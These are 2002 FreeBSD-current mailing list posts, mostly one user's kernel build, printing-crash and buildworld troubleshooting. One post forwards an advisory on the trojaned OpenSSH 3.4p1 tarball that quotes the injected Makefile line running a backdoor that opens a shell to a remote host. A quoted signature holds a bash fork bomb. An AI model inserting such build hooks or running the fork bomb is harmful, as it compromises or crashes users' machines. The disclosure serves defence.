kernel compile errors 5.0-DP1

2002-07-22 Thread Karl Agee

here's the errors:

===> NEWKERNEL
mkdir -p /usr/obj/usr/src/sys
cd /usr/src/sys/i386/conf;
PATH=/usr/obj/usr/src/i386/usr/sbin:/usr/obj/usr/src/i386/usr/bin:/usr/obj/usr/src/i386/usr/games:/sbin:/bin:/usr/sbin:/usr/bin
 

config -d /usr/obj/usr/src/sys/NEWKERNEL
/usr/src/sys/i386/conf/NEWKERNEL
config: Device "pci" requires a count
FYI: static unit limits for ppp are set: NPPP=1
config: Device "card" requires a count
FYI: static unit limits for atkbdc are set: NATKBDC=1
FYI: static unit limits for sc are set: NSC=1
config: 2 errors
*** Error code 1
Stop in /usr/src.
*** Error code 1
Stop in /usr/src.


--karl


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: kernel compile errors 5.0-DP1

2002-07-22 Thread Karl Agee

At 02:04 AM 7/23/2002 +0200, Simon 'corecode' Schubert wrote:
>On Mon, 22 Jul 2002 15:51:14 -0700 Karl Agee wrote:
>
> > config -d /usr/obj/usr/src/sys/NEWKERNEL
> > /usr/src/sys/i386/conf/NEWKERNEL
> > config: Device "pci" requires a count
> > FYI: static unit limits for ppp are set: NPPP=1
> > config: Device "card" requires a count
> > FYI: static unit limits for atkbdc are set: NATKBDC=1
> > FYI: static unit limits for sc are set: NSC=1
> > config: 2 errors
> > *** Error code 1
> > Stop in /usr/src.
> > *** Error code 1
>
>are you sure that's DP1? i suspect that's a new source tree and so you
>need to follow changes of the essential build system.


Yes, it's DP-1...that is what I started with.  I've updated the source 
tree...I'll read up on it.


>pci now needs a count, as config states. read GENERIC for details.


Thanks for the help

--karl




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Mission Accomplished!!!

2002-07-23 Thread karl agee

heh.  Thanks to y'all I finally accomplished my goal--I've got my DP-1
kernel recompiled for sound and updated my system to -current AND I am
listening to a cd on my freebsd box.

heh heh

Not bad for an old fart geek, eh?

--karl




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



kernel crash when rebooting old kernel

2002-07-26 Thread karl agee

Ok, I tried rebooting to my old orig kernel (5.0-DP1) to see if it
helped my printing issue.  well, this happened when I rebooted:

Panic:  Malloc type lacks magic

Debugger ("panic")

stopped at Debugger+0x40 xorl%eax, %eax

?

--karl




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



firewall support?

2002-07-27 Thread karl agee

is firewall support built into the -current kernel or does it need to be
compiled in?

--karl




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: -current now really bad

2002-07-28 Thread karl agee

On Sun, 2002-07-28 at 16:24, Lamont Granquist wrote:
> 
> I cvsup'd and built last night around midnight and now I can reliably
> induce a freeze by firing up X and trying to load a page in mozilla
> (firing up mozilla doesn't do it, but the first page i try to load kills
> it).  I get no crash dumps, and have to physically power the machine down.

 uh oh, I'm downloading -current source right_now... 8-(

--karl


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



make buildworld crashing

2002-07-29 Thread karl agee

I just updated my source and running make buildworld crashes here:

cd /usr/src/usr.bin/makewhatis;  make DIRPRFX=usr.bin/makewhatis/ obj; 
make DIRPRFX=usr.bin/makewhatis/ depend;  make
DIRPRFX=usr.bin/makewhatis/ all;  make DIRPRFX=usr.bin/makewhatis/
DESTDIR=/usr/obj/usr/src/i386 install
/usr/obj/usr/src/i386/usr/src/usr.bin/makewhatis created for
/usr/src/usr.bin/makewhatis
make: don't know how to make bsd.README. Stop
*** Error code 2

Stop in /usr/src.
*** Error code 1

Stop in /usr/src.
*** Error code 1

Stop in /usr/src.





To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



where's perl???

2002-07-26 Thread karl agee

I am trying to install imwheel in my -current setup...ran make install
in the port (updated yesterday) and it ran the compliation but bombed at
perl.  It sed:

su-2.05a# make install; make clean
>> imwheel-0.9.9.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
>> Attempting to fetch from http://jonatkins.org/imwheel/files/.
Receiving imwheel-0.9.9.tar.gz (411882 bytes): 100%
411882 bytes transferred in 102.9 seconds (3.91 kBps)
===>  Extracting for imwheel-0.9.9
>> Checksum OK for imwheel-0.9.9.tar.gz.
===>   imwheel-0.9.9 depends on executable: gmake - found
===>   imwheel-0.9.9 depends on shared library: X11.6 - found
===>  Patching for imwheel-0.9.9
===>  Applying FreeBSD patches for imwheel-0.9.9
/usr/local/bin/perl: not found
*** Error code 127

on my box perl is located

su-2.05a# whereis perl
perl: /usr/bin/perl /usr/share/man/man1/perl.1.gz /usr/src/usr.bin/perl

I checked various files to see if I could edit anything but there was
nothing obvious.  Should I make a link to /usr/bin/perl?

--karl




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



is linux compatibility broken???

2002-07-26 Thread karl agee

is linux compatibility broken???

I need to upgrade my linux-base from 6.1.1  to 7.1  so I can install
realplayeram I in for a rude awakening if I do??

--karl




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



system crashes; reboots when printing

2002-07-26 Thread karl agee

ok, what's going on here???

system: 5.0-current.  

trying to print to a post script laser printer which works fine in the
past.  setup using apsfilter.

When I attempt to print any file from any program the desktop locks up
then the system reboots.  why?

I havent found any log messages when this happens.

I also run setiathome.  I've noticed that when this happens the seti
workunit progress is lost and it starts where it left off at the last
session.

--karl




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: system crashes; reboots when printing

2002-07-26 Thread karl agee

On Fri, 2002-07-26 at 19:24, Garance A Drosihn wrote:
> At 6:43 PM -0700 7/26/02, karl agee wrote:
> >system: 5.0-current. 
> >
> >trying to print to a post script laser printer which works fine
> >in the past.  setup using apsfilter.
> >
> >When I attempt to print any file from any program the desktop
> >locks up then the system reboots.  why?
> 
> Try copying a postscript file directly to the printer (skip
> apsfilter and all of lpr), and see if you still get a system
> crash.  That will help to point to where the problem might be.
> 
> If this is a networked printer, then you'll probably want to
> use lpr but skip apsfilter.

Excuse my newbie ignorance, but, how to do print a file bypassing lpr
and apsfilter

--karl




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: system crashes; reboots when printing

2002-07-26 Thread karl agee

On Fri, 2002-07-26 at 18:43, karl agee wrote:
> ok, what's going on here???
> 
> system: 5.0-current.  
> 
> trying to print to a post script laser printer which works fine in the
> past.  setup using apsfilter.
> 
> When I attempt to print any file from any program the desktop locks up
> then the system reboots.  why?
> 
> I havent found any log messages when this happens.
> 
> I also run setiathome.  I've noticed that when this happens the seti
> workunit progress is lost and it starts where it left off at the last
> session.
> 
> --karl

well...I tried testing communications with the printer via the method in
the handbook

# lptest > /dev/lpt0

you guess it...it crashed and rebooted as before.

what could be going on?

--karl



To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: system crashes; reboots when printing

2002-07-27 Thread karl agee

On Sat, 2002-07-27 at 00:21, David Wolfskill wrote:
> >From: karl agee <[EMAIL PROTECTED]>
> >Date: 26 Jul 2002 20:44:24 -0700
> 
> >> If this is a networked printer, then you'll probably want to
> >> use lpr but skip apsfilter.
> 
> >Excuse my newbie ignorance, but, how to do print a file bypassing lpr
> >and apsfilter
> 
> For a directly-connected (i.e., attached via parallel or serial port)
> printer, just use "cp" to copy the file to the device (special file,
> such as /dev/lpt).

David:

Yes, this printer is directly connected parallel port.  

It worked  8-)  I was able to print a simple ps file directly to the
printer w/o crashing!!!

Ok, so now_what..??

--karl


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: system crashes; reboots when printing

2002-07-27 Thread karl agee

On Sat, 2002-07-27 at 09:25, karl agee wrote to recap:
> 
> > 
> > system: FreeBSD enterprise.workgroup 5.0-CURRENT FreeBSD 5.0-CURRENT #0: Tue Jul 
>23 16:07:44 PDT 2002
 [EMAIL PROTECTED]:/usr/obj/usr/src/sys/NEWKERNEL  i386
> > 
> > trying to print to a post script laser printer which works fine in the
> > past.  setup using apsfilter.
> > 
> > When I attempt to print any file from any program the desktop locks up
> > then the system reboots.  why?
> > 
> > I havent found any log messages when this happens.

If I copy a .ps file directly to the printer it prints ok.

I've updated ghostscript and that didnt work.  I tried running apsfilter
again and when I tried printing the test page it crashed.  So the
problem apsfilter?

I recently (last week) upgraded apsfilterdidnt have this problem,
should I drop back to the older version

any other ideas

--karl


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: system crashes; reboots when printing

2002-07-27 Thread karl agee

Here's the salient section of my printcap made up by apsfilter; what
should I edit here??

# APS1_BEGIN:printer1
# - don't delete start label for apsfilter printer1
# - no other printer defines between BEGIN and END LABEL
lp|ljet2p;r=600x600;q=high;c=gray;p=letter;m=auto:\
:lp=/dev/lpt0:\
:if=/usr/local/etc/apsfilter/basedir/bin/apsfilter:\
:sd=/var/spool/lpd/lp:\
:lf=/var/spool/lpd/lp/log:\
:af=/var/spool/lpd/lp/acct:\
:mx#0:\
:sh:
# APS1_END - don't delete this



To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



printing woes: PROBLEM IDENTIFIED

2002-07-27 Thread karl agee

I've located the source of my printing problems:  It's the kernel.

I was able to boot into my orig 5.0-DP1 kernel, I redid the printer
config using apsfilter and I can print w/o problems to my hearts
content.

If I boot into my new kernel (source installed last monday nite) and
attempt to print it crashes instantly.  

So there's a problem with the -current kernel.  Anyone else seen this??

(I've contributed somewhat to freebsd development...I'm so proud..)

--karl




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: make buildworld crashing

2002-07-30 Thread karl agee

On Tue, 2002-07-30 at 00:28, Munish Chopra wrote:

> 
> cd /usr/src/share/mk && make install
> 
> I believe (hope?) that fixes it.

Barfed in the same place.  8-(

here's the output:

su-2.05a# cd /usr/src/share/mk && make install
date '+%Y%m%d' > /var/db/port.mkversion
install -o root -g wheel  -m 444 bsd.README bsd.cpu.mk bsd.dep.mk
bsd.doc.mk bsd.files.mk bsd.incs.mk bsd.info.mk bsd.init.mk bsd.kern.mk
bsd.kmod.mk bsd.lib.mk bsd.libnames.mk bsd.links.mk bsd.man.mk
bsd.nls.mk bsd.obj.mk bsd.own.mk bsd.port.mk bsd.port.post.mk
bsd.port.pre.mk bsd.port.subdir.mk bsd.prog.mk bsd.subdir.mk bsd.sys.mk
sys.mk /usr/share/mk

then I ran make buildworld and it crashed as before.

maybe I'll update my source later today and try it again.

--karl


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Fwd: <3CLUG> !!!! [mikael.olsson@clavister.com: openssh-3.4p1.tar.gz distribution recently trojaned] !!!!

2002-08-01 Thread Karl Agee

FYIfrom my Linux User Group maillist.

--karl

>X-Authentication-Warning: quince.tricity.wsu.edu: majordomo set sender to 
>[EMAIL PROTECTED] using -f
>Date: Thu, 1 Aug 2002 13:20:48 -0700
>From: Ed <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: <3CLUG>  [[EMAIL PROTECTED]: openssh-3.4p1.tar.gz 
>distribution recently trojaned] 
>Mail-Followup-To: [EMAIL PROTECTED]
>User-Agent: Mutt/1.2.5.1i
>Sender: [EMAIL PROTECTED]
>
>
>if you didn't know this already, some copies of the source distribution
>of openssh are *trojaned*!  the _untrojaned_ version has this md5 sum:
>459c1d0262e939d6432f193c7a4ba8a8 (use md5sum openssh-3.4p1.tar.gz to
>check it).  the trojan horse connects to a computer in australia and
>opens a shell on the local machine.
>
>   Ed
>
>- Forwarded message from Mikael Olsson <[EMAIL PROTECTED]> -
>
>Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
>Precedence: bulk
>List-Id: 
>List-Post: 
>List-Help: 
>List-Unsubscribe: 
>List-Subscribe: 
>Delivered-To: mailing list [EMAIL PROTECTED]
>Delivered-To: moderator for [EMAIL PROTECTED]
>Date: Thu, 01 Aug 2002 13:20:47 +0200
>From: Mikael Olsson <[EMAIL PROTECTED]>
>Organization: Clavister AB
>To: [EMAIL PROTECTED]
>Subject: openssh-3.4p1.tar.gz distribution recently trojaned
>X-MailScanner: Found to be clean
>
>
>From
>http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
>
>- Forwarded message from Edwin Groothuis <[EMAIL PROTECTED]> -
>
>Date: Thu, 1 Aug 2002 16:55:51 +1000
>From: Edwin Groothuis <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: openssh-3.4p1.tar.gz trojaned
>
>Greetings,
>
>Just want to inform you that the OpenSSH package op ftp.openbsd.org
>(and probably all its mirrors now) it trojaned:
>
> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
>
>The OpenBSD people have been informed about it (via email to
>[EMAIL PROTECTED] and via irc.openprojects.org/#openbsd)
>
>
>The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
>  all: libopenbsd-compat.a
>+   @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
>./bf-test.out &
>
>bf-test.c[1] is nothing more than a wrapper which generates a
>shell-script[2] which compiles itself and tries to connect to an
>server running on 203.62.158.32:6667 (web.snsonline.net).
>
>[1] http://www.mavetju.org/~edwin/bf-test.c
>[2] http://www.mavetju.org/~edwin/bf-output.sh
>
>This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
>ports system:
> MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
>
>This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
> MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
>
>Edwin
>
>--
>Edwin Groothuis  |Personal website: http://www.MavEtJu.org
>[EMAIL PROTECTED]|Weblog: http://www.mavetju.org/weblog/weblog.php
>bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
>
>- End forwarded message -



To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



make: don't know how to make bsd.README. Stop

2002-08-02 Thread karl agee

the crash occurs right after the process starts..here's the entire
output:

su-2.05a# make buildworld

--
>>> Rebuilding the temporary build tree
--
rm -rf /usr/obj/usr/src/i386
mkdir -p /usr/obj/usr/src/i386/usr/bin
mkdir -p /usr/obj/usr/src/i386/usr/lib/compat/aout
mkdir -p /usr/obj/usr/src/i386/usr/games
mkdir -p /usr/obj/usr/src/i386/usr/libdata/ldscripts
mkdir -p /usr/obj/usr/src/i386/usr/libexec/elf
mkdir -p /usr/obj/usr/src/i386/usr/sbin
mkdir -p /usr/obj/usr/src/i386/usr/share/misc
mkdir -p /usr/obj/usr/src/i386/usr/share/dict
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devX100
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devX100-12
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devX75
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devX75-12
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devascii
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devcp1047
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devdvi
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devhtml
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devkoi8-r
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devlatin1
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devlbp
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devlj4
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devps
mkdir -p /usr/obj/usr/src/i386/usr/share/groff_font/devutf8
mkdir -p /usr/obj/usr/src/i386/usr/share/tmac/mdoc
mkdir -p /usr/obj/usr/src/i386/usr/share/tmac/mm
mkdir -p /usr/obj/usr/src/i386/usr/include/arpa
mkdir -p /usr/obj/usr/src/i386/usr/include/dev
mkdir -p /usr/obj/usr/src/i386/usr/include/fs
mkdir -p /usr/obj/usr/src/i386/usr/include/g++/backward
mkdir -p /usr/obj/usr/src/i386/usr/include/g++/bits
mkdir -p /usr/obj/usr/src/i386/usr/include/g++/ext
mkdir -p /usr/obj/usr/src/i386/usr/include/isc
mkdir -p /usr/obj/usr/src/i386/usr/include/isofs
mkdir -p /usr/obj/usr/src/i386/usr/include/libmilter
mkdir -p /usr/obj/usr/src/i386/usr/include/objc
mkdir -p /usr/obj/usr/src/i386/usr/include/openssl
mkdir -p /usr/obj/usr/src/i386/usr/include/protocols
mkdir -p /usr/obj/usr/src/i386/usr/include/readline
mkdir -p /usr/obj/usr/src/i386/usr/include/rpc
mkdir -p /usr/obj/usr/src/i386/usr/include/rpcsvc
mkdir -p /usr/obj/usr/src/i386/usr/include/security
mkdir -p /usr/obj/usr/src/i386/usr/include/ufs
ln -sf /usr/src/sys /usr/obj/usr/src/i386

--
>>> stage 1: bootstrap tools
--
cd /usr/src; MAKEOBJDIRPREFIX=/usr/obj/usr/src/i386  DESTDIR= 
INSTALL="sh /usr/src/tools/install.sh" make -f Makefile.inc1
-DBOOTSTRAPPING  -DNOHTML -DNOINFO -DNOMAN -DNOPIC -DNOPROFILE
-DNOSHARED  -DNO_CPU_CFLAGS -DNO_WERROR bootstrap-tools
cd /usr/src/games/fortune/strfile;  make DIRPRFX=games/fortune/strfile/
obj;  make DIRPRFX=games/fortune/strfile/ depend;  make
DIRPRFX=games/fortune/strfile/ all;  make DIRPRFX=games/fortune/strfile/
DESTDIR=/usr/obj/usr/src/i386 install
/usr/obj/usr/src/i386/usr/src/games/fortune/strfile created for
/usr/src/games/fortune/strfile
rm -f .depend
mkdep -f .depend -a-D__FBSDID=__RCSID 
/usr/src/games/fortune/strfile/strfile.c
echo strfile: /usr/lib/libc.a  >> .depend
cc -O -pipe -Wall-D__FBSDID=__RCSID -c
/usr/src/games/fortune/strfile/strfile.c
cc -O -pipe -Wall-D__FBSDID=__RCSID  -static -o strfile strfile.o 
sh /usr/src/tools/install.sh -s -o root -g wheel -m 555   strfile
/usr/obj/usr/src/i386/usr/games
cd /usr/src/usr.bin/yacc;  make DIRPRFX=usr.bin/yacc/ obj;  make
DIRPRFX=usr.bin/yacc/ depend;  make DIRPRFX=usr.bin/yacc/ all;  make
DIRPRFX=usr.bin/yacc/ DESTDIR=/usr/obj/usr/src/i386 install
/usr/obj/usr/src/i386/usr/src/usr.bin/yacc created for
/usr/src/usr.bin/yacc
make: don't know how to make bsd.README. Stop
*** Error code 2

Stop in /usr/src.
*** Error code 1

Stop in /usr/src.
*** Error code 1

Stop in /usr/src.




To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: make: don't know how to make bsd.README. Stop

2002-08-02 Thread Karl Agee

At 08:56 PM 8/2/2002 -0700, Steve Kargl wrote:
>On Fri, Aug 02, 2002 at 08:17:19PM -0700, karl agee wrote:
> > the crash occurs right after the process starts..here's the entire
> > output:
> >
> > su-2.05a# make buildworld
> >
>
>I just built world with sources cvsup'd 2 hours ago.


about the same time I did it...so, why is mine crashing?

should I dump the whole /usr/src and suck it back down?

--karl


>--
>Steve


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: make: don't know how to make bsd.README. Stop

2002-08-02 Thread karl agee

well, it's running now...

I deleted the /usr/src/share/mk directory, and re-cvsup'ed it...it
downloaded new files and she is going now...

maybe we'll get this puppy up and running the way I want it now...

-karl


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



Re: make: don't know how to make bsd.README. Stop

2002-08-02 Thread karl agee

ok...its crashing here, now.I've deleted the /usr/src/gnu directory
and re-cvsuped it, but it still_crashes:


/usr/src/contrib/gcc/config/i386/freebsd.h:208:1: warning: this is the
location of the previous definition
In file included from
/usr/obj/usr/src/i386/usr/src/gnu/usr.bin/cc/cc_tools/tconfig.h:13,
 from
/usr/obj/usr/src/i386/usr/src/gnu/usr.bin/cc/cc_tools/hconfig.h:2,
 from
/usr/obj/usr/src/i386/usr/src/gnu/usr.bin/cc/cc_tools/config.h:1,
 from
/usr/src/gnu/usr.bin/cc/cc1plus/../../../../contrib/gcc/cp/parse.y:34,
 from /usr/src/contrib/gcc/cp/spew.c:34:
/usr/src/gnu/usr.bin/cc/cc_tools/freebsd-native.h:61:25: attempt to use
poisoned "malloc"
/usr/src/gnu/usr.bin/cc/cc_tools/freebsd-native.h:62:25: attempt to use
poisoned "calloc"
/usr/src/gnu/usr.bin/cc/cc_tools/freebsd-native.h:63:25: attempt to use
poisoned "realloc"
/usr/src/gnu/usr.bin/cc/cc_tools/freebsd-native.h:64:25: attempt to use
poisoned "strdup"
mkdep: compile failed
*** Error code 1

Stop in /usr/src/gnu/usr.bin/cc/cc1plus.
*** Error code 1

Stop in /usr/src/gnu/usr.bin/cc.
*** Error code 1

Stop in /usr/src.
*** Error code 1

Stop in /usr/src.
*** Error code 1

Stop in /usr/src.


To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message



parallel ports

2002-09-07 Thread karl agee

I've had a lot of problems--and so have a few others (very few) with the 4.6 
kernels not recognizing parallel ports to the point they are not useable.  
simply cant use them to print.  The kernel on boot spits out "ppc0: cannot 
reserve range".  

I have installed 5.0-DP1 and it_does properly recognize the parallel ports.  
HOWEVER if I cvsup the kernel source and recompile a new kernel (fer 
instance, for sound card support) that capability goes away.

Has anyone else seen this??? NOthing I have done with the 4.6- or 4.7 kernels 
has helped.  

Guess it's back to 5.0-DP1, if I want to print, eh?

--karl

To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message